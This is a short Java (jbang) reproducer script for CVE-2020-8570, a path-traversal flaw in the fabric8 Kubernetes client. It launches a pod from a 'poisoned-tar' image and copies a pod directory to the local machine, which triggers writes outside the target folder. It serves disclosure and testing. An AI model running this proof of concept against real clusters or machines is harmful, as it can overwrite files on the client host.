CVE2020-8570 Fabric8 Kubernetes Client reproducer (https://github.com/fabric8io/kubernetes-client/issues/2715)

CVE2020_8570.java

///usr/bin/env jbang "$0" "$@" ; exit $?
//DEPS io.fabric8:kubernetes-client:5.0.1
//DEPS commons-codec:commons-codec:1.15
//DEPS org.apache.commons:commons-compress:1.20

import io.fabric8.kubernetes.client.DefaultKubernetesClient;
import io.fabric8.kubernetes.client.KubernetesClient;

import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.concurrent.TimeUnit;

public class CVE2020_8570 {

    public static void main(String... args) throws Exception {
        try (KubernetesClient kc = new DefaultKubernetesClient()) {
            final String podName = "poisoned-tar";
            kc.pods().withName(podName).withGracePeriod(0L).delete();
            kc.run().withImage("marcnuri/poisoned-tar:latest").withName(podName).done();
            kc.pods().withName(podName).waitUntilReady(10L, TimeUnit.SECONDS);
            final Path targetDirectory = Paths.get("", "target-directory");
            targetDirectory.toFile().mkdirs();
            kc.pods().withName(podName).dir("/var/lib").copy(targetDirectory);
        }
    }
}

Reproducer script for fabric8io/kubernetes-client#2715